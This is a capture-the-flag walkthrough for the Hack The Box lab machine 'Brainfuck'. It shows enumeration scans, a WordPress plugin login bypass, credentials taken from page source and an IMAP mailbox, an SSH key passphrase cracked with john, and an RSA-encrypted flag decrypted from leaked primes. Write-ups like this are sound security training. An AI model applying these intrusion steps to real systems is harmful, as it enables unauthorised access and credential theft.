Difficulty Rating:

Machine: Brainfuck
OS: Linux
IP: 10.10.10.17

  • Nmap TCP scan
$ nmap -A -sV -Pn  10.10.10.17 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-01 21:17 IST
Nmap scan report for 10.10.10.17
Host is up (0.19s latency).
Not shown: 995 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_  256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (EdDSA)
25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) PIPELINING AUTH-RESP-CODE RESP-CODES UIDL USER TOP CAPA
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: IMAP4rev1 OK LOGIN-REFERRALS LITERAL+ more ID post-login have IDLE listed Pre-login SASL-IR AUTH=PLAINA0001 ENABLE capabilities
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after:  2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg: 
|_  http/1.1
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.55 seconds
  • Dirb for https://brainfuck.htb
$ dirb https://brainfuck.htb -X .php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Aug  2 22:22:39 2017
URL_BASE: https://brainfuck.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://brainfuck.htb/ ----
+ https://brainfuck.htb/index.php (CODE:301|SIZE:0)                                                                      
+ https://brainfuck.htb/wp-blog-header.php (CODE:200|SIZE:0)                                                        
+ https://brainfuck.htb/wp-config.php (CODE:200|SIZE:0)                                                                  
+ https://brainfuck.htb/wp-cron.php (CODE:200|SIZE:0)                                                                       
+ https://brainfuck.htb/wp-links-opml.php (CODE:200|SIZE:224)                                                            
+ https://brainfuck.htb/wp-load.php (CODE:200|SIZE:0)                                                                        
+ https://brainfuck.htb/wp-login.php (CODE:200|SIZE:2244)                                                             
+ https://brainfuck.htb/wp-mail.php (CODE:403|SIZE:3444)                                                                            
+ https://brainfuck.htb/wp-settings.php (CODE:500|SIZE:0)                                                           
+ https://brainfuck.htb/wp-signup.php (CODE:302|SIZE:0)                                                                  
+ https://brainfuck.htb/wp-trackback.php (CODE:200|SIZE:135)                                                                
+ https://brainfuck.htb/xmlrpc.php (CODE:405|SIZE:42)                                                                                
                                                                                                                                                                                             
-----------------
END_TIME: Wed Aug  2 22:43:08 2017
DOWNLOADED: 4612 - FOUND: 12
  • Wpscan
$ sudo wpscan -u https://brainfuck.htb --disable-tls-checks -e --log brainfuck_wpscan.txt
  • Nikto
nikto -h https://brainfuck.htb
b- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.17
+ Target Hostname:    brainfuck.htb
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=GR/ST=Attica/L=Athens/O=Brainfuck Ltd./OU=IT/CN=brainfuck.htb/[email protected]
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=GR/ST=Attica/L=Athens/O=Brainfuck Ltd./OU=IT/CN=brainfuck.htb/[email protected]
+ Start Time:         2017-08-02 22:53:37 (GMT5.5)
---------------------------------------------------------------------------
+ Server: nginx/1.10.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <https://brainfuck.htb/?rest_route=/>; rel="https://api.w.org/"
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /, fields: 0x58ef50da 0x264 
+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7446 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-08-03 00:39:04 (GMT5.5) (6327 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • Use following exploit to login as admin. Just change administrator to admin in username field and the action="https://brainfuck.htb/wp-admin/admin-ajax.php"
  • Start apache server and copy the form in /var/www/html and submit it through browser.
  • Now go to https://brainfuck.htb/wp-admin and you will be logged in.
  • Visit https://brainfuck.htb/wp-admin/options-general.php?page=swpsmtp_settings and get the password by viewing its source code.
  • The password is kHGuERB29DNiNE and username is orestis
  • Telnet to IMAP server, port 143:
$ telnet 10.10.10.17 143
Trying 10.10.10.17...
Connected to 10.10.10.17.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=PLAIN] Dovecot ready.
? LOGIN orestis kHGuERB29DNiNE         
? OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SPECIAL-USE] Logged in
? LIST "" "*"
* LIST (\HasNoChildren) "/" INBOX
? OK List completed (0.000 + 0.000 secs).
? Select INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 2 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1493461609] UIDs valid
* OK [UIDNEXT 5] Predicted next UID
* OK [HIGHESTMODSEQ 4] Highest
? OK [READ-WRITE] Select completed (0.000 + 0.000 secs).
? FETCH 1 All
* 1 FETCH (FLAGS (\Seen) INTERNALDATE "17-Apr-2017 20:15:40 +0300" RFC822.SIZE 977 ENVELOPE ("Mon, 17 Apr 2017 17:15:40 +0000" "New WordPress Site" (("WordPress" NIL "wordpress" "brainfuck.htb")) (("WordPress" NIL "wordpress" "brainfuck.htb")) (("WordPress" NIL "wordpress" "brainfuck.htb")) ((NIL NIL "orestis" "brainfuck.htb")) NIL NIL NIL "<[email protected]>"))
? OK Fetch completed (0.027 + 0.000 secs).
? FETCH 2 All
* 2 FETCH (FLAGS (\Seen) INTERNALDATE "29-Apr-2017 13:12:06 +0300" RFC822.SIZE 514 ENVELOPE ("Sat, 29 Apr 2017 13:12:06 +0300 (EEST)" "Forum Access Details" (("root" NIL "root" "brainfuck.htb")) (("root" NIL "root" "brainfuck.htb")) (("root" NIL "root" "brainfuck.htb")) ((NIL NIL "orestis" "brainfuck.htb")) NIL NIL NIL "<[email protected]>"))
? OK Fetch completed (0.001 + 0.000 secs).
? FETCH 2 BODY[]
* 2 FETCH (BODY[] {514}
Return-Path: <[email protected]>
X-Original-To: orestis
Delivered-To: [email protected]
Received: by brainfuck (Postfix, from userid 0)
	id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: [email protected]
Subject: Forum Access Details
Message-Id: <[email protected]>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: [email protected] (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards
)
? OK Fetch completed (0.001 + 0.000 secs).
  • username for secret forum is orestis and password is kIEnnfEKJ#9UmdO

  • Dirsearch

./dirsearch.py -t 500 -u https://sup3rs3cr3t.brainfuck.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e .php

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: .php | Threads: 500 | Wordlist size: 220547

Target: https://sup3rs3cr3t.brainfuck.htb/

[22:20:14] Starting: 
[22:20:20] 500 -    4KB - /login
[22:20:20] 301 -  194B  - /storage  ->  https://sup3rs3cr3t.brainfuck.htb/storage/
[22:20:21] 301 -  194B  - /assets  ->  https://sup3rs3cr3t.brainfuck.htb/assets/
[22:20:21] 301 -  194B  - /uploads  ->  https://sup3rs3cr3t.brainfuck.htb/uploads/
[22:20:21] 301 -  194B  - /scripts  ->  https://sup3rs3cr3t.brainfuck.htb/scripts/
[22:20:22] 200 -    7KB - /
[22:20:41] 301 -  194B  - /vendor  ->  https://sup3rs3cr3t.brainfuck.htb/vendor/
[22:21:12] 200 -    1KB - /LICENSE

Task Completed
  • Go to https://sup3rs3cr3t.brainfuck.htb/d/3-key
  • The messages are encrypted using Vigenère cipher
  • Visit http://www.dcode.fr/vigenere-cipher to decrypt the message.
  • Key is : FUCKMYBRAIN
  • Path to download key is: https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
  • Download the key and convert it to work with john
    $ ./sshng2john.py id_rsa > rsa2john.txt
    
    Output is in file rsa2john.txt
  • Use john to bruteforce the password
    $ /usr/sbin/john rsa2john.txt --wordlist=/usr/share/wordlists/rockyou.txt
    Using default input encoding: UTF-8
    Loaded 1 password hash (SSH-ng [RSA/DSA 32/64])
    Note: This format may emit false positives, so it will keep trying even after
    finding a possible candidate.
    Press 'q' or Ctrl-C to abort, almost any other key for status
    3poulakia!       (id_rsa)
    1g 0:00:00:13 DONE (2017-08-21 17:03) 0.07547g/s 1082Kp/s 1082Kc/s 1082KC/s *7¡Vamos!
    Session completed
    
  • Password is 3poulakia!
  • SSH to get in using this password
$ ssh -i id_rsa [email protected]
[email protected]:~$ ls -la encrypt.sage 
-rw-rw-r-- 1 orestis orestis 580 Apr 29 15:14 encrypt.sage
[email protected]:~$ nano encrypt.sage 
[email protected]:~$ ls -la
total 72
drwxr-xr-x 8 orestis orestis  4096 Aug 21 14:49 .
drwxr-xr-x 3 root    root     4096 Apr 13 09:50 ..
-rw------- 1 root    root    11296 Apr 29 15:33 .bash_history
-rw-r--r-- 1 orestis orestis   220 Apr 13 09:50 .bash_logout
-rw-r--r-- 1 orestis orestis  3771 Apr 13 09:50 .bashrc
drwx------ 2 orestis orestis  4096 Apr 29 15:34 .cache
drwxr-xr-x 3 root    root     4096 Apr 17 21:18 .composer
drwxrwxr-x 2 orestis orestis  4096 Aug 21 14:49 .nano
-rw-r--r-- 1 orestis orestis   655 Apr 13 09:50 .profile
drwx------ 8 orestis orestis  4096 Apr 29 15:13 .sage
drwx------ 2 orestis orestis  4096 Apr 17 01:01 .ssh
-rw------- 1 orestis orestis   619 Apr 29 15:14 debug.txt
-rw-rw-r-- 1 orestis orestis   580 Apr 29 15:14 encrypt.sage
drwx------ 3 orestis orestis  4096 Apr 29 13:26 mail
-rw------- 1 orestis orestis   329 Apr 29 15:14 output.txt
-rw------- 1 orestis orestis    33 Apr 29 13:46 user.txt
[email protected]:~$ cat output.txt 
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
[email protected]:~$ cat encrypt.sage 
nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)



c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
  • Execute eucledian_algorithm.py to get the flag
  • Value of p,q and e was obtained from debug.txt
  • Value of ct is obtained from output.txt
$ python euclidean_algorithm.py 
d_hex: 0xc6eccf2d2584044e2173cf0efa88f839ee184df56ce3e6aa450cfcdf9e5ec8b4d8123c2cd57ee4bf7c84e423941191ec57a7944e31327a722143edc1981ecf24bd9b389d673a1bd44288103e501f46994b700ac1abcb15339ff0750566957064605eb9205d159360fb6b907b39ee98683b0f6f418619fcb1665c4c7fa7984e9L
n_dec: 8730619434505424202695243393110875299824837916005183495711605871599704226978295096241357277709197601637267370957300267235576794588910779384003565449171336685547398771618018696647404657266705536859125227436228202269747809884438885837599321762997276849457397006548009824608365446626232570922018165610149151977
pt_dec: 24604052029401386049980296953784287079059245867880966944246662849341507003750
flag
XXXXXXX
User and Root owned!!
Resource for the alogrithm

Share the fun!